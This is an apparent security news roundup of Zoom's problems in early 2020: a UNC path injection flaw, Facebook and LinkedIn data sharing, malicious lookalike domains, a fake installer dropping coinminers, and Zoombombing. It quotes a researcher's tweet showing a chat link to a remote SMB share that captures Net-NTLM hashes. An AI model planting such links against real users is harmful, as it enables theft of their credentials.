The controversial app Zoom has been making headlines in the cyber world recently. The app has become quite popular since the COVID-19 outbreak started; however, the security of the app is questioned as it has been recently making headlines in cybersecurity news numerous times.
Videoconferencing software company Zoom provides an online communication platform for audio and video conferencing, online meetings, and chatting.
With the COVID-19 pandemic going on, videoconferencing apps like Zoom have immensely increased in popularity as millions of employees are now working from home, and people are forced to maintain online communication only. Threat actors see this situation as the best opportunity to exploit the app and users’ data. Threat Hunting has compiled a full report on everything Zoom has been involved with since the COVID-19 pandemic.
UNC path injection vulnerability could result in credentials theft
On March 23, security researcher @_g0dmode warned about a vulnerability affecting the Zoom Windows client. The flaw in the chat feature (UNC path injection) could allow attackers to steal the Windows login credentials of users.
Upon sending a chat message, any URLs in the message are converted into clickable hyperlinks; this could allow attackers to deliver malware and steal credentials.
The SMBRelay technique is used in the attacks conducted by exploiting the UNC path injection vulnerability; the SMBRelay could expose username and NTLM password hashes to a remote SMB server upon connecting to it.
#Zoom chat allows you to post links such as \\x.x.x.x\xyz to attempt to capture Net-NTLM hashes if clicked by other users.
— Mitch (@_g0dmode) March 23, 2020
The Facebook data-sharing feature
On March 26, Motherboard published an analysis on the Zoom’s Facebook data-sharing feature. The report says that the iOS version of Zoom sends users’ analytics data to Facebook, even if users don’t have a Facebook account. This practice is not uncommon; the Facebook SDK allows users to sign in the app using their Facebook credentials, but it also prompts in sharing users’ data.
Zoom domains could lead to malware installation
On March 30, cybersecurity firm, CheckPoint, published a research report saying that “a major increase in new domain registrations with names including ‘Zoom’” has been witnessed.
“Since the beginning of the year, more than 1700 new domains were registered and 25% of them were registered in the past week. Out of these registered domains, 4% have been found to contain suspicious characteristics.” CheckPoint says.
CheckPoint experts have also detected malicious files that, if executed, could lead to the installation of the InstallCore PUA (potentially unwanted application) which could prompt in additional malware installation.
Zoom’s data-mining feature grants access to LinkedIn profiles
According to a New York Times investigation published on April 2, a data mining feature allowed users to snoop on other users’ LinkedIn profile data.
“A data-mining feature on Zoom allowed some participants to surreptitiously have access to LinkedIn profile data about other users — without Zoom asking for their permission during the meeting or even notifying them that someone else was snooping on them.” Reads the New York Times report.
“Once a Zoom user enabled the feature, that person could quickly and covertly view LinkedIn profile data — like locations, employer names and job titles — for people in the Zoom meeting by clicking on a LinkedIn icon next to their names.” New York Times explained.
Zoom web client outage
Around the beginning of April, users started reporting that they were unable to access the Zoom web client, and the web client was displaying a ‘403 Forbidden’ error. Some users also reported time out errors saying that “Your connection has timed out and you cannot join the meetings. Verify your network connectivity and try again.” The errors were mostly effecting users from the US East Coast and Western Europe.
Zoom stated that they were working to get the Web Client and Web SDK back online.
It is not all Zoom’s fault
Zoom has become the perfect target for trolls and threat actors to crash online meetings (Zoombombing) and deliver malware.
With the Zoom’s increase in popularity during the COVID-19 pandemic, threat actors are now taking advantage of the popular app to distribute malware such as cryptominers, RATs, and adware.
Fake Zoom installer drops coinminers
On April 3, TrenMicro published a report saying that they have discovered a fake Zoom installer capable of installing cryptominers on the victims’ computers.
“We found a Coinminer bundled with the legitimate installer of video conferencing app Zoom, luring users who want to install the software but end up unwittingly downloading a malicious file. “
The malicious Zoom installer is an AutoIt compiled malware, Trojan.Win32.MOOZ.THCCABO, that drops three coinminers; it also contains a legitimate Zoom installer version 18.104.22.168.
Other than the major security problems, users were facing other inconveniences as well.
There have been numerous reports on Zoombombing saying that users’ meetings were invaded with pornographic images, hate speech, or even threats.
Zoombombing is when an uninvited person joins a Zoom meeting and starts throwing racial slurs or sharing pornographic and offensive imagery.
Anyone, including Zoombombers, can join a public meeting, if they get access to the link, thus it is recommended to be cautious with sharing public Zoom meeting links on social media.
Zoom is resolving the problems
Zoom fixed the problems regarding Windows login credentials theft, and they also removed the Facebook SDK feature to protect users’ safety.
They added a Waiting Room feature which allows meeting hosts to accept or reject participants. Zoom also removed meeting IDs to prevent them from being exposed in screenshots. These measures were taken to prevent Zoombombing incidents as much as possible.
Zoom has also formed a CISO Council and an Advisory Board to review and resolve the recent security issues.
Secure Your Organization’s Mind with Securemind.se